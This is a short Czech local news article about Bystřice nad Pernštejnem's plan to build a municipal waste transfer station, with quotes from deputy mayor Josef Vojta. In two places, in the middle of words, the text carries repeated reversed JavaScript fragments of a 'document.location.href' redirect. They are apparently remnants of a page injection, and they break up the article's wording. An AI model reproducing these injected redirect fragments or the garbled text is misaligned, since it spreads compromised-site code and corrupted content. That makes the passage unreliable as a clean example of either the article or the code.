Rainbow page separator

V Bystřici chtějí postavit překladiště odpadu

Neděle, 25. srpna 2013

Bystřice nad Pernštejnem / Na zhruba pět milionů korun by mělo vyjít vybudování překladiště komunálního odpadu, které plánují zástupci bystřické radnice. Vzniknout má v areálu technických služeb.

„Předpokládáme, že v budoucnu budeme vozit komunální odpad dále než jen na bukovskou skládku, například někam do spalovny. Musíme tedy myslet na ekonomickou stránku provozu. Odpad v překladišti přeložíme do velkoobjemových kontejnerů nebo vozů, abychom jej odváželi ve větším množství a ušetřili na nákladech za dopravu,“ uvedl mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Bystřice nad Pernštejnem Josef Vojta.

Nyní Bystřičtí připravují studii plánovaného překladiště, v příštím roce by měla přijít na řadu projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace. „Na stavbu samotnou dojde nejdříve v roce 2015, počítáme s podporou nějakého dotačního titulu pro nakládání s odpady,“ dodal Josef Vojta.